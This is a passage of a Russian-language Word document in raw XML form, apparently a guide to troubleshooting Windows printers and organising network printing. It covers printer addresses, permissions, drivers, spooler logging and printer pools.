    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если устанавливаемый принтер подключен к другому компьютеру сети и является общим, необходимо, чтобы данный компьютер был включен. Чтобы проверить подключение компьютера к сети и узнать текущее имя принтера, обратитесь к владельцу компьютера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Неизвестен TCP/IP-адрес принтера</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При наличии у принтера области отображения в ней обычно доступна команда меню для просмотра или печати сведений о конфигурации принтера, включая TCP/IP-адрес. В некоторых принтерах для печати сведений о конфигурации необходимо нажать и удерживать определенную кнопку или использовать иную схему действия. Информацию о доступных способах можно получить из документации к принтеру.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Мастер установки принтеров не может определить устанавливаемый принтер Bluetooth или беспроводной принтер</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проверьте, подключен ли к компьютеру адаптер Bluetooth и включен ли он и принтер Bluetooth. Возможно, потребуется удалить подключение к принтеру Bluetooth и с помощью мастера установки принтеров попытаться определить его еще раз. Если мастер установки принтеров по-прежнему не может определить устанавливаемый принтер, обратитесь к документации по принтеру, чтобы убедиться в его правильной установке для работы с данным компьютером, и попытайтесь снова.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Не удается изменить свойства принтера или управлять очередью печати для принтера</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для изменения свойств и управления очередью печати принтера требуется наличие разрешения. Войдите в систему с правами администратора и попытайтесь снова.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если вход в систему с правами администратора не помогает, это может означать, что разрешения для принтеров по умолчанию для администраторов изменились. Вместо этого необходимо получить разрешение на управление принтером и документами для принтера от того, кто имеет эти разрешения. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Чтобы управлять принтером или очередью печати с правами администратора</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Откройте папку </w:t>
      </w:r>
      <w:hyperlink r:id="rId240" w:tooltip="Панель управления" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Панель управления</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:hyperlink r:id="rId241" w:tooltip="Панель управления. Раздел &quot;Оборудование и звук&quot;" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Оборудование и звук</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Принтеры</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Щелкните правой кнопкой мыши требуемый принтер, выберите команду Запуск от имени администратора и щелкните нужный параметр. </w:t>
      </w:r>
      <w:r w:rsidR="00B56D78" w:rsidRPr="00B56D78">
        <w:rPr>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Требуется разрешение администратора" style="width:11.5pt;height:11.5pt"/>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Введите пароль администратора или подтверждение пароля, если появится соответствующий запрос.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совет</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Чтобы изменить свойства принтера или управлять документами в очереди печати, не входя в систему с правами администратора для выполнения каждого изменения, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>можно дать себе разрешения на выполнение этих задач. При входе в систему с правами администратора откройте окно свойств принтера, щелкните вкладку Безопасность, выберите текущее имя пользователя и затем, в группе Разрешить установите флажки Управление принтерами и Управление документами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Печать на сетевом принтере не выполняется</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если ранее при использовании данного принтера таких проблем не возникало, попробуйте выполнить следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проверьте работу сети и убедитесь, что компьютер правильно подключен к сети. Дополнительные сведения смотрите в следующих разделах справки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId242" w:tooltip="Просмотр состояния домашней сети" w:history="1">
        <w:r w:rsidR="008D764F" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Просмотр состояния домашней сети</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId243" w:tooltip="Определение и разрешение проблем с домашней сетью" w:history="1">
        <w:r w:rsidR="008D764F" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Определение и разрешение проблем с домашней сетью</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId244" w:tooltip="Устранение неполадок связанных с подключением к сети и интернету" w:history="1">
        <w:r w:rsidR="008D764F" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Устранение неполадок с сетью и подключением Интернета</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проверьте состояние принтера в очереди печати или проверьте, включен ли принтер и готов ли он к работе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если принтер подключен к другому компьютеру сети и является общим, убедитесь, что данный компьютер включен. Если он включен, а проблема по-прежнему существует, обратитесь к владельцу компьютера, чтобы проверить, подключен ли данный компьютер к сети.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">При печати на принтере, установленном с использованием TCP/IP-адреса вместо имени принтера, убедитесь, что текущий компьютер подключен к Интернету или сети, в которой установлен принтер. В случае недавнего отключения питания TCP/IP-адрес принтера мог измениться. Новый адрес не будет работать с портом принтера, который использовался для подключения принтера к компьютеру. Попробуйте добавить принтер снова. Дополнительные сведения смотрите в разделе </w:t>
      </w:r>
      <w:hyperlink r:id="rId245" w:tooltip="Установка и удаление принтера" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Установка и удаление принтера</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если недавно была установлена новая версия ОС Windows, изменен драйверпринтера или печать на принтере выполняется впервые, может потребоваться установить драйверы принтера, совместимые с текущей версией Windows. Если используется общий принтер сети, подключенный к другому компьютеру, проверьте, установлен ли на нем драйвер для версии Windows данного компьютера. Дополнительные сведения смотрите в разделе </w:t>
      </w:r>
      <w:hyperlink r:id="rId246" w:tooltip="Поиск и установка драйверов принтера" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Поиск и установка драйверов принтера</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Чтобы просмотреть текущую версию Windows для выбора совместимых драйверов, выполните следующие действия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Откройте папку </w:t>
      </w:r>
      <w:hyperlink r:id="rId247" w:tooltip="Панель управления" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Панель управления</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:hyperlink r:id="rId248" w:tooltip="Панель управления. Раздел &quot;Система и её обслуживание&quot;" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Система и ее обслуживание</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:hyperlink r:id="rId249" w:tooltip="Панель управления. Раздел &quot;Центр начальной настройки&quot;" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Центр начальной настройки</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Показать подробности / Индекс производительности Windows / Дополнительные инструменты</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Щелкните Просмотр дополнительных сведений о системе и просмотрите Название ОС и Тип системы, чтобы узнать текущую версию операционной системы Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Подробнее см. </w:t>
      </w:r>
      <w:hyperlink r:id="rId250" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://vistablog.com.ua/Windows/view_windows.php?id=263</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Советы </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>по организации сетевой печати.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совет 1. Восстановите порядок в журналах печати</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Администраторы, периодически проверяющие журналы Event Viewer System, находят сообщения о печати на каждом компьютере, который действует в роли принт-сервера. Сообщения появляются парами: в первом из них говорится, что тот или иной пользователь отпечатал определенный документ, а во втором, поступившем несколькими секундами позже, – что задание было удалено из принтера. Microsoft устанавливает данный режим аудита по умолчанию. По всей вероятности, эта информация может пригодиться только для того, чтобы взимать с пользователей плату за печать документов. Чтобы Event Viewer не заполнялся этими ненужными записями, требуется на каждом компьютере, действующем в качестве принт-сервера, выполнить следующую процедуру: открыть папку Printers (в Windows Server 2003 и Windows XP она называется Printers and Faxes) и выбрать File, Server Properties. На вкладке Advanced, показанной на рис. 1, нужно снять флажок Log spooler information events.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1353277" cy="1540800"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="268" name="Рисунок 1" descr="http://www.osp.ru/data/649/526/1234/08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osp.ru/data/649/526/1234/082_1.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId251" cstate="print">
                      <a:lum bright="10000" contrast="20000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1353385" cy="1540922"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Рисунок 1. Диалоговое окно свойств принт-сервера, вкладка Advanced</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>При желании можно также снять флажок Log spooler warning events. Предупреждения появляются в журнале всякий раз, когда кто-либо из пользователей, имеющий подходящие полномочия, меняет конфигурацию принтера или принт-сервера. Включение этой функции имеет смысл, только когда в журнале системы появляются сообщения об ошибках печати и требуется проверить, не были ли эти ошибки вызваны неудачным изменением параметров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совет 2. Разрешите группе Print Operators добавлять принтеры</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Если среди пользователей есть такие, кто знает о Windows достаточно, чтобы устанавливать и настраивать принтеры, вполне целесообразно разрешить им это делать. Большинство администраторов добавляют таких пользователей в группу Print Operators, встроенную доменную группу. Однако при попытке установить принтер с драйверами независимых разработчиков члены группы Print Operators получают сообщение об ошибке Access Denied. В процессе установки принтера Windows копирует .inf-файл принтера в папку %systemroot%inf. Запись в эту папку (содержащую драйверы принтеров) членам группы Print Operators система Windows странным образом запрещает. Необходимо изменить разрешения папки %systemroot%inf и добавить право записи группе Print Operators. Драйверы принтеров Windows уже расположены в папке %systemroot%inf, поэтому при установке принтеров, имеющих драйверы Windows, никакой записи не происходит, и сообщение об ошибке не появляется.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совет 3. Используйте пулы принтеров для балансировки нагрузки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Можно использовать пулы принтеров для подстраховки службы печати в критически важных операциях. Организация принтерных пулов – хороший способ равномерно распределить загрузку принтеров в моменты очень интенсивной печати.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Если принтерный пул организован, то виртуальный принтер (пиктограмма в папке Printers, соответствующая установленному драйверу принтера) может посылать задания на печать нескольким физическим принтерам. Физические принтеры должны быть одной и той же модели или иметь режим эмуляции, допускающий управление со стороны драйвера принтера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
